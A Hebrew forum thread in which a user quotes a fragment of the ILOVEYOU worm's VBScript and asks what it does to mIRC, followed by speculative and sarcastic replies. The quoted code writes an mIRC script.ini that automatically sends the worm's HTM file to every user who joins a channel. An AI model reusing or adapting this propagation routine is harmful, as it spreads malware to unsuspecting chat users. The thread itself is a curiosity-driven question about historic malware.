שעיינתי בסקריפט של הוירוס המפורסם I Love You, גיליתי שורה מעניינת על Mirc, אך מכיוון שאני לא יודע Visual Basic, לא הבנתי בדיוק במה מדובר. מה עושה הוירוס ל Mirc ?
אני לי מושג ב Mirc. אני לא משתמש בזה בכלל. רק רציתי לדעת מה פשר הסקריפט הבא: if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close (לקוח מאת iloveyou.txt.vbs)
יכול להיות גם שזה של מישהו שרצה להפיץ את הוירוס במירק אז הוא כתב לעצמו בסקריפט שכל מי שיכנס למירק אוטומטית זה ישלח לו את הוירוס דווקא חמוד מה שהוא עשה אבל בטח שאל תחשוב שזה תוכן הוירוס זה תוכן סקריפט המירק של מישהו שרצה לשלוח את הוירוס לכל אחד שנכנס למירק
בטוח שלא מי שכתב רצה להפיץ אותו במירק כי מי שכתב אותו מספיק חכם בשביל להפיץ אותו בדרכים אחרות כי גם כל הסרברים במירק חוסמים קבצים מהסוג הזה אז לא יודע מה הוא רצה זה היה בטח סתם אפס שניסה להרוס לאנשים את המחשבים אבל בטוח שזה לא הכותב של הוירוס
נכון ! - באמת ! מי אלה ה"אפסים" הממרים את פי ה סוכריה אל המקל שלנו ?! - מה הם חושבים לעצמם ?! - גם כן מיקצוענים - הchoopie שלנו will root them with netstat only ! הוא הרי סופר האקר - מה לא ידעת ?